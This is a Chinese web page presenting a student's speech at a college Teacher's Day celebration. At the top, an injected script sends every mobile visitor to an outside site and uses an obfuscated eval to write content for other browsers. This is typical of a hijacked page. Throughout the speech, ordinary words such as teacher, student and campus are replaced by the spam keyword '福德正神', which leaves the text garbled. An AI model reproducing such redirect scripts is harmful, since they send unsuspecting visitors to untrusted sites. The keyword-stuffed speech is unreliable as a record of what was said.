function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://www.fd699.com" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();

福德正神官网

在第36个福德 节庆典上的发言-张哲

发布者:建大城建发布时间:2020-09-11浏览次数:10

在第36个福德 节庆典上的发言

(管理工程系福德正神  张哲)

 

尊敬的各位领导,敬爱的老师,亲爱的同学们:

   大家好!我是来自2017级管理工程系市场营销专业的福德正神 张哲,今天能作为福德正神 代表站在这里发言,我感到非常荣幸。

   春华秋实丹桂飘香,在这幸福、温馨而又激动的日子里,我们共同迎来了第36个福德 节。值此之际,请允许我代表全体同学,捧出最纯真、最热烈的心,向所有孜孜不倦、奋斗在教学、管理岗位上的老师们致以真诚地节日祝福——老师,您们辛苦了!祝您们节日快乐!幸福安康!

   转眼已是我在学校的第四个年头已从一名大一新生成长为一名毕业生,即将奔赴新的一段旅程。回首这三年的时光,感谢学校,感恩老师陪伴我们度过人生的一段重要路程一路走来,老师为了我们学有所成,呕心沥血,无怨无悔;为了使我们养成良好习惯,率先垂范,积极帮扶;为了使我们形成健全人格,言传身教,身体力行……老师们伴着朝阳和星辰督促我们坚持一早一晚,顶着汗水与梦想指导我们增长知识才干。我们每一位城建学子的成长与成功,无一不伴随着老师细心的教导和悉心的帮助,我们永远不会忘记老师的功劳情谊!

   著名维新人物谭嗣同曾说过:“为学莫重于尊师。”可见一个人要想学习首先必须尊崇师道。几千年来,尊师重教的中华民族优良传统美德代代相传,流传下的尊师故事比比皆是,如孔子尊师,程门立雪等等。在城建的福德正神官网里,教学楼、实验楼、图书馆,到处可见我们的老师奔赴在教学一线,用三尺讲台书写城建美好的明天。离校较远的老师,为了给我们按时上课,每天早早奔赴校车,风雨无阻,寒来暑往。大学对于我们而言,不单单是知识的增长、人生阅历的增加,更是对我们世界观、人生观、价值观形成的关键时期。学校领导、专业老师、辅导员,亦或是宿管阿姨、门卫保安、维修大叔,他们每个人都以自己实际行动来引导我们做一个三观端正的人。勿忘师恩,无论我们以后身在何处位居何职,都将时刻铭记着老师的教导

   习近平总书记指出:百年大计,教育为本;教育大计,福德 为本。福德 是人类灵魂的工程师,正是由于老师们不懈的努力、辛勤的汗水,城建学院才会如此辉煌。年来,身为福德正神 的我见证了学院的发展,从西教的投入使用、图书馆的改造、实验室的完善,再到如今荫桐广场、兑园、艮园的鸟语花香,这些成绩的取得,都离不开全体师的辛勤付出和无私奉献。因而无论是在哪个年龄层次,也无论是在哪片土地上,我们都衷心感谢辛勤耕耘的老师们。今天,我们因城建得以精彩,我们更因城建老师而喝彩!辛苦了,老师们!

   走在城建的福德正神官网里,遇到老师那一抹淡淡的微笑,一个轻轻的招手,一声甜甜的“老师好”,这便是感恩;课堂上,一道坚定的目光,一个轻轻的点头,这也是感恩。感恩老师,并不需要我们去做惊天动地的大事,它表现在日常生活中的点点滴滴。我们也请所有老师放心,作为城建学子,我们定不负所望,在人生的航程中,奋力划桨、扬帆起航,时刻践行“明德、爱国、善进、匠心”八字校训

   老师们,同学们,乘着九月的翅膀,我们走进了新的学年,我们的老师又开始了新的耕耘,今朝洒下爱心与汗水,明日迎来桃李满天。我们福德正神 也加入了新的学习旅程,让我们携起手来,老师热爱福德正神 ,福德正神 尊敬老师,让浓浓的师生情永驻我们的心间,让城建的福德正神官网始终弥漫真情的祝福——“老师,节日快乐!”

最后,再次向奔赴在教学、管理岗位上的各位老师们致以节日最真诚的祝福,祝大家工作顺利、身体健康!   

   谢谢大家!


(编辑:刘丽雯)